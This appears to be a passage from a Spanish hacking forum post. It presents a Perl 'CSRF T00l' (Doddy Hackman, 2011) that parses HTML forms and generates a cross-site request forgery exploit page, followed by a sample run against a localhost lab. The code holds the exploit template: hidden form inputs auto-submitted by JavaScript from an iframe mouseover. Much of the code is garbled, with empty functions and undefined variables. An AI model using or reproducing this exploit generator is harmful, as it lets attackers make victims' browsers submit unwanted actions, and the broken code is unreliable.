para la vulnerabildiad Cross Site Request Forgery , despues genera el resultado
en una carpeta creada con el programa con el nombre de la web.
Código
#!usr/bin/perl
#CSRF T00l (C) Doddy Hackman 2011
use HTML::Form;
installer();
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
unless(-f $_[0]) {
copyright();
}
my @testar = HTML::Form->parse($words,"/");
$count = 0;
foreach my $test(@testar) {
$count++;
if ($test->attr(name) eq "") {
} else {
}
@inputs = $test->inputs;
foreach $in(@inputs) {
}
}
if ($op ne "") {
$op--;
my $probar = (HTML::Form->parse($words,"/"))[$op];
my $action = ver($words,$op);
my $fin = nombre($action).".html";
savefile("<form action=$action method=".$probar->method." name=exploit>",$fin);
@input = $probar->inputs;
foreach $in(@input) {
savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin);
}
my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()}
</script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
";
savefile($final,$fin);
}
}
sub ver {
my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]];
my $action = $probar->action;
my $co = $action;
if ($action eq "" or $action eq "/"){
} else {
}
}
sub installer {
unless (-d "logs_csrf/") {
}}
sub nombre {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
}
sub savefile {
close SAVE;
}
sub sintax {
}
sub head {
}
sub copyright {
}
# ¿ The End ?
Ejemplo de uso
Código:
C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
Finales\CSRF Tool>tool.pl read.txt
-- == CSRF T00l == --
[+] File to parse : read.txt
-- == Form 1 == --
[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET
-- == Input == --
Type Name Value
text ver
password veras
submit control Agregar
-- == Form 2 == --
[+] Name : No Found
[+] Action : /
[+] Method : POST
-- == Input == --
Type Name Value
text ac
submit ee aaa
[+] Form to generate : 1
[+] Value of the ver : aaa
[+] Value of the veras : aaa
[+] Value of the control : aaa
[+] CSRF Exploit Generated
[+] To can see in logscsrf/localhost.html
-- == Doddy Hackman 2011 == --


 
  




 Autor
 Autor
		



 En línea
									En línea
								

